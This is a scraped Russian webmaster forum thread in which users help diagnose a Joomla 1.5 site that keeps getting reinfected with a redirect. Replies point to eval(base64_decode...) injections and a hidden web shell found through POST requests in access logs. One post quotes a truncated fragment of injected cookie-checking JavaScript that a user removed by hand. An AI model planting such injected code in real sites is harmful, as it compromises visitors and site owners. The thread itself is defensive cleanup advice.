- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Компонент JCE стоит в joomla? В папке /images/stories/ есть файл story.php с кодом:
мой совет, не поленитесь скачать с фтп весь движок и сравнить с оригиналом, есть специальные проги, а пароль менять смысла нету если ето гомно там.
Проверьте php файлики на предмет вредоносного кода, типа eval(base64_decode...
Тут скрипт есть для проверки, думаю поможет Вам. Вот статья по теме на хабре.
Компонент JCE стоит в joomla? В папке /images/stories/ есть файл story.php с кодом:
щас посмотрю
---------- Добавлено 17.01.2013 в 20:48 ----------
мой совет, не поленитесь скачать с фтп весь движок и сравнить с оригиналом, есть специальные проги, а пароль менять смысла нету если ето гомно там.
я полностью удалил цмс и заново залил годичной давности, а проблему заметил на новый год, вроде убрал, но сейчас опять вылезло.
---------- Добавлено 17.01.2013 в 20:49 ----------
Проверьте php файлики на предмет вредоносного кода, типа eval(base64_decode...
Тут скрипт есть для проверки, думаю поможет Вам. Вот статья по теме на хабре.
по фтп файлы не открывает касперский пишет что троян
ну так к себе скачайте на комп и сравните, а Каспера думаю знаете как отключить.
я полностью удалил цмс и заново залил годичной давности, а проблему заметил на новый год, вроде убрал, но сейчас опять вылезло.
После того как годичной давности залили обновили до последней версии?
щас посмотрю
---------- Добавлено 17.01.2013 в 20:48 ----------
я полностью удалил цмс и заново залил годичной давности, а проблему заметил на новый год, вроде убрал, но сейчас опять вылезло.
---------- Добавлено 17.01.2013 в 20:49 ----------
по фтп файлы не открывает касперский пишет что троян
JCE не стоит
---------- Добавлено 17.01.2013 в 21:01 ----------
После того как годичной давности залили обновили до последней версии?
обновил до 1.5.26, боюсь если поставить последнюю версию могут измениться урлы
---------- Добавлено 17.01.2013 в 21:08 ----------
ну так к себе скачайте на комп и сравните, а Каспера думаю знаете как отключить.
зачем качать, если и так ясно что файлы заражены, я писал что удалял и заливал все заново, какое то время все хорошо, потом опять все заражено.
---------- Добавлено 17.01.2013 в 21:19 ----------
У меня как-то заразился сайт клинета, правда всего оилн ищза всю практику, пришло кака кидиотке вручяную силдить перебирать усе .js скипты которые были в сайте и в конце каждого удалть код function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+... прятногт мало, ноговолрят есть скирпт, я правда никаким языками не владею, но он есть. короче я чустила вручную, часов 15-20 так точно ушло.
(тоже была joomla правла ренее где-то 1.5.23 или около того, короче даже гугл выдлавал типа "заходлить опасно все дела" почиститила все .jsб обновила до последней 1.5.26 плюс напиcfла хостеру , чтобызапретил доступ по фтп вроде полет нормальный - гугл с яндесом смилостивились вернули сайт в поиск без предупреждений).
была джумла 1.5.23 обновил до 1.5.26
зачем качать, если и так ясно что файлы заражены, я писал что удалял и заливал все заново, какое то время все хорошо, потом опять все заражено.
Правильно. Во всех php файлах у вас дописан код типа eval(base64_decode... Если его расшифровать, то это и есть код редиректа.
Дописывается эта гадость через шелл или бэкдор, залитый на любой из сайтов на аккаунте.
Хотите быстро найти его - смотрите логи запросов к сайтам. Найти легко - к этому файлу будут запросы POST, а не GET.
То что вы перезалили джумлу - ничего не значит, шелл там уже мог быть/он мог быть не в джумле/у хостера криво настроен сервер - вариантов масса, но без логов всё это просто догадки.
Правильно. Во всех php файлах у вас дописан код типа eval(base64_decode... Если его расшифровать, то это и есть код редиректа.
Дописывается эта гадость через шелл или бэкдор, залитый на любой из сайтов на аккаунте.
Хотите быстро найти его - смотрите логи запросов к сайтам. Найти легко - к этому файлу будут запросы POST, а не GET.
То что вы перезалили джумлу - ничего не значит, шелл там уже мог быть/он мог быть не в джумле/у хостера криво настроен сервер - вариантов масса, но без логов всё это просто догадки.
HTTP логи?
HTTP логи?
Да, access.log например.